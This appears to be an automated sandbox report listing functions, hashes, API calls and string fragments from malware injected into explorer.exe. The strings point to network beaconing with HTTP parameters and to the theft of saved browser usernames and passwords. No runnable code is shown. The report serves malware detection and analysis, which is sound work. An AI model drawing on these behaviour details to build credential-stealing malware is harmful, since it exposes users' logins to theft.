Opcode Fuzzy Hash: 76b51d963e76a84d3595092a02404b212d7f1551aabcdf7f5d74ec5ada8c1725
Instruction Fuzzy Hash: 0E713471E112299FDF00CFA8C884A9DBBB9FF48351F1540AAE905FB264E734A905CF58

Uniqueness

Uniqueness Score: -1.00%

Function 342BA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 342BA0F7
RtlDebugPrintTimes.NTDLL ref: 342BA1AA
RtlDebugPrintTimes.NTDLL ref: 342BA1CE
RtlDebugPrintTimes.NTDLL ref: 342BA1E3

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3e4a1b95b06591e27445412a517f7d816a88c314f7053dded2cc44904e9be388
Instruction ID: 3996cb06c2f54c0c0e01b4e07db561fc69f4063f7958404409b112fda758d71b
Opcode Fuzzy Hash: 3e4a1b95b06591e27445412a517f7d816a88c314f7053dded2cc44904e9be388
Instruction Fuzzy Hash: 92518E74B20A139FEF08CE18D890A19BBE6FB89390F12446DD956E7710DB71EC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3425EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3425EEED
RtlDebugPrintTimes.NTDLL ref: 3425EF12
RtlDebugPrintTimes.NTDLL ref: 3425EFA4
RtlDebugPrintTimes.NTDLL ref: 3425EFF8

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4b512e9eef5da1e65d45333cd54d55c6d4bfca07265f06e1719b6ad63a87c351
Instruction ID: c9413c6aca461300be6ec82c81d491af878ed822e104fa3811f821ae06f65175
Opcode Fuzzy Hash: 4b512e9eef5da1e65d45333cd54d55c6d4bfca07265f06e1719b6ad63a87c351
Instruction Fuzzy Hash: B75111B6E102199FDB04CF99C844ADDFBB6FF48360F15806AE815BB260DB749901CF58

Uniqueness

Uniqueness Score: -1.00%

Function 34217A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34217A72
BaseThreadInitThunk.KERNEL32 ref: 34217A7C
RtlDebugPrintTimes.NTDLL ref: 342547F8
RtlDebugPrintTimes.NTDLL ref: 3425487B

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 7ee4b354ca6cdbca28b4e0a793ab07f499688348a41407aa323714dab4d4ce39
Instruction ID: 5813b98589b04e3ed88d843ecce0f06b3fca9f34928725640c0b378ade4c51e7
Opcode Fuzzy Hash: 7ee4b354ca6cdbca28b4e0a793ab07f499688348a41407aa323714dab4d4ce39
Instruction Fuzzy Hash: 30313475E01219DFDF05DFA9D888A9EBBF1FB48320F10416AE921B72A0CB359901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 341E58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 342408AE

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae34705824d762a5bee9cc6904c967013fc3608854809e62b1c1f5cb05e8f60d
Instruction ID: 182b8af700ead6c9a16ef192e1bfb925bdcb38cf868b13c8c5d6571d791814b9
Opcode Fuzzy Hash: ae34705824d762a5bee9cc6904c967013fc3608854809e62b1c1f5cb05e8f60d
Instruction Fuzzy Hash: A1327978E00B29CFEB65CFA4C884BE9BBB5BB08304F4041E9D549A7241DB749AC4DF91

Uniqueness

Uniqueness Score: -1.00%

Function 34288B90 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 34288B9E
{(4, xrefs: 34288EBE

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: HEAP: ${(4
API String ID: 0-698600493
Opcode ID: d04d152e2da46677679f14399e30e95e1a61eac42914de5f80c1b04d433afd35
Instruction ID: 7964c9b8428eff54f4a02a1db14dc743f09477120b9fbce20553e396b8ea5686
Opcode Fuzzy Hash: d04d152e2da46677679f14399e30e95e1a61eac42914de5f80c1b04d433afd35
Instruction Fuzzy Hash: EBB18B71A093419FD720CF28C880A1FBBE5BF94754F904A2EF994EB295D770D904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 34214B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 34214BE3
Flst, xrefs: 34214BB6

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: ee57f6be8b3bb470b9277bdbb3a5a8cf834d786f3a5687ff5c44822664bf4ba0
Instruction ID: 162910ff9da5f051000e2a2615b3e11b1480a41879c8830504829abec05cadec
Opcode Fuzzy Hash: ee57f6be8b3bb470b9277bdbb3a5a8cf834d786f3a5687ff5c44822664bf4ba0
Instruction Fuzzy Hash: BB518BB5E01289CFEB14CF99C884B99FBF5EF44795F14826ED049BB250EB709985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 341DDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341DDFE0

Strings

0, xrefs: 341DDFC0
0, xrefs: 341DDFAB

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 84c71acd0d52ff54f18b0db0e9b3fae4b4193fb49e35defb9b489d7dd9db66db
Instruction ID: 6890e2a65bd086bc03fc8f016b0d725c27fb8ab2bdf658f65544089a61074383
Opcode Fuzzy Hash: 84c71acd0d52ff54f18b0db0e9b3fae4b4193fb49e35defb9b489d7dd9db66db
Instruction Fuzzy Hash: C6415DF5A08B01DFD300CF28C484A5ABBE5BB89354F444A6EF588DB340D771EA06CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 5384, Parent PID: 6720COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	446
Total number of Limit Nodes:	16

Executed Functions

Function 0A72FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0A73012E
setsockopt.WS2_32 ref: 0A730830
recv.WS2_32 ref: 0A730859

Strings

nnec, xrefs: 0A73032A
ose, xrefs: 0A73033F
GET , xrefs: 0A730318
tion, xrefs: 0A730331
&sql, xrefs: 0A730471
: cl, xrefs: 0A730338
&un=, xrefs: 0A7304F1
Co, xrefs: 0A730323
dat=, xrefs: 0A730290
&br=, xrefs: 0A730509

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 3068cd3854f2de2c7be95f8e38ebd24ffa338a0adaa1a7038e997f4ed44af4e1
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: DE529131614A088FDB69EF68C4887E9B7E1FB58300F51862EC49FC7147DE74A54ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A72F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0A72F449

Strings

`, xrefs: 0A72F41D

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: bb343b66b48531aef1b96d35b3bdcec04a22a72f62d3f3cef0c7c3db31a280ec
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 79224C70A18A199FDB99EF28C4986AEF7F1FB58301F51822ED45ED3250DB30A465CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0A730E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0A730E67

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: a559d901b6f3cee472db6d7dd012d5f37e398d0e73c86ae1296185f10fcce587
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 2201B130668B484F9B88EF6CE48422AB7E4FBDD315F000B3EE99AC3250EB70C5414742

Uniqueness

Uniqueness Score: -1.00%

Function 0A730E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0A730E67

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 00ca401b344a9ac445e831b20723b8d4fdb8398f84324cc7abe5e7a209d3cc32
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 5401A234668B884B8B88EF6C94452A6B3E5FBCE314F004B3EE9DAC3241DB21D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 0A72A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0A72A9A0

Strings

nt: , xrefs: 0A72A91E
User-Agent: , xrefs: 0A72A935, 0A72A948
urlmon.dll, xrefs: 0A72A959
on.d, xrefs: 0A72A902

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: cd23e7ee04291b5925d0379f39d5c7969f2bd785e761292c6cc06bf1024e4b76
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: AC31D431614A5C8BCF44EFA8C8487EDB7E0FB58205F41422AD44ED7241DE788649C785

Uniqueness

Uniqueness Score: -1.00%

Function 0A72A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0A72A9A0

Strings

nt: , xrefs: 0A72A91E
User-Agent: , xrefs: 0A72A935, 0A72A948
urlmon.dll, xrefs: 0A72A959
on.d, xrefs: 0A72A902

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 90f7ef1942dd089aac22b005bf834c42d2907264976fee92a290d0f651d024b7
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 2421E631610A5C8BCF04EFA9C8487EDBBE0FF58205F41822AD45AD7242DF748609CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A726B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0A726CCA

Strings

.dll, xrefs: 0A726BCD
kern, xrefs: 0A726B99
el32, xrefs: 0A726BA0

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 64f32a4df89572eca90c0b4ece9ed9a6985906009540a1ab5266605bd46ff9dc
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 85415E71918A1C8FDB54EFA8C8987AD77E0FB58300F45827AC84ADB256DE309949CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A726B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0A726CCA

Strings

.dll, xrefs: 0A726BCD
kern, xrefs: 0A726B99
el32, xrefs: 0A726BA0

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: a0cbcddd815d098718909e427faf0b28f1ed5d4f7ed5b28d50f267ee8dba90e7
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 2B413C71918A1C8FDF94EFA8C4987AD77F0FB68300F45816AC84EDB256DE309945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0A72C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0A72C791

Strings

conn, xrefs: 0A72C75A
ect, xrefs: 0A72C761

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 34539af6883c594779d8bb33e820483d820ec4d86cfb5f702540aa678f9b9e07
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: C9015E30618B188FCB84EF1CE088B55B7E0FB68314F1545AED90DCB226C774C8858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0A72C732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0A72C791

Strings

conn, xrefs: 0A72C75A
ect, xrefs: 0A72C761

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 11945de087c0ab692108b7a4185e64feaa910e94e742a56a3e59da28ad1a082f
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 81012C70618A1C8FCB84EF5CE088B55BBE0FB59315F1541AEE90DCB226CB74C9858BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0A72C6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0A72C713

Strings

send, xrefs: 0A72C6DA

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: d2c5ac7b242658e2e0316b1874f8e7b0f740389192642cfcdf3b41b51671881b
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: AE015270518A188FDBC4EF1CD048B2577E0EB58314F1541AED85DCB266C670D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0A72C5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0A72C611

Strings

sock, xrefs: 0A72C5D9

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: af7b3689e204ee3ce41a341668a62aa02c23545821e99b70429208c2a66f6165
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 8401447061861C8FCB84EF1CD048B54BBE0FB59314F1545ADD45EDB266C7B0C985CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0A7242DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0A72432D

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: da11ae4ce8253a999253ae46ebcf1ea4b0cad7f6989240f08d57b7d1cf703a99
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: D9316B74624B19DFEB68EF2980882E5BBA4FB54301F45827EC92DDA107CB349468CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0A724412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0A724461

Memory Dump Source

Source File: 00000004.00000002.14574028347.000000000A680000.00000040.80000000.00040000.00000000.sdmp, Offset: 0A680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_a680000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 2792f608f5931d38b0f9c61a17287c9d2f658edd2396bd783aab39cce7181e88
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 67F0FC30268A484FD784EF2CD44563AF3D0FBE8215F45463ED54DC3255DA75C5814715

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 118F6D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

net., xrefs: 118F6F44
M, xrefs: 118F7082
el32, xrefs: 118F6F27
S, xrefs: 118F7073
dll, xrefs: 118F6F4C
.dll, xrefs: 118F6F2F
ll, xrefs: 118F6F13
kern, xrefs: 118F6F5A
wini, xrefs: 118F6F72
user, xrefs: 118F6F03
32.d, xrefs: 118F6F0B

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 99383c5b42c7e37f610a33ed8ca2d4e33a16aac55849494d945786497793bde6
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 54E17974628F498FD764DF68C4847AAB7E1FB58304F408A2E95AFC7241DF30A545CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 118F9792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

rnam, xrefs: 118F98B5
encr, xrefs: 118F98D2
encr, xrefs: 118F989D
e, xrefs: 118F98BD
d, xrefs: 118F98F2
swor, xrefs: 118F98EA
Subm, xrefs: 118F9855
ypte, xrefs: 118F98A5
name, xrefs: 118F987D
itUR, xrefs: 118F985D
user, xrefs: 118F9876
Fiel, xrefs: 118F9884
dPas, xrefs: 118F98E2
form, xrefs: 118F984D
dUse, xrefs: 118F98AD
ypte, xrefs: 118F98DA
guid, xrefs: 118F97CE

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 79bd3d995ab8c872a40b3938b77c51cba7b7c353e59015f08e04714ebe636b2c
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 79B18B70618B488EDB55EF68C489AEEB7F1FF98304F50452ED49AC7261EF70A405CB86

Uniqueness

Uniqueness Score: -1.00%

Function 118F7622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

p, xrefs: 118F7690
d, xrefs: 118F767B
n, xrefs: 118F76BA
d, xrefs: 118F76A5
u, xrefs: 118F7661
d, xrefs: 118F76CF
t, xrefs: 118F76C8
c, xrefs: 118F7697
i, xrefs: 118F769E
l, xrefs: 118F76AC
s, xrefs: 118F7689
l, xrefs: 118F7682
w, xrefs: 118F76B3
2, xrefs: 118F7674
l, xrefs: 118F76D6
e, xrefs: 118F766D
n, xrefs: 118F76C1

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: fe2a32e4e62d15b81524ab837f6f5623ceed962c4ec0bb4ad2ade666679c712b
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 3041D370A18B098FEB14EF8CA8457BD7BE2FB48704F00425ED809D3245DBB5AD458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 118FEAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 118FEC66
e, xrefs: 118FECA0
[, xrefs: 118FEC2D
[, xrefs: 118FEBF6
n, xrefs: 118FEC98
[, xrefs: 118FECCD
b, xrefs: 118FEC73
[, xrefs: 118FEC90
l, xrefs: 118FECE2
], xrefs: 118FEC3D
D, xrefs: 118FECDA
], xrefs: 118FECA8
l, xrefs: 118FEC35
c, xrefs: 118FEC0B

Memory Dump Source

Source File: 00000004.00000002.14583691810.0000000011850000.00000040.00000001.00040000.00000000.sdmp, Offset: 11850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11850000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
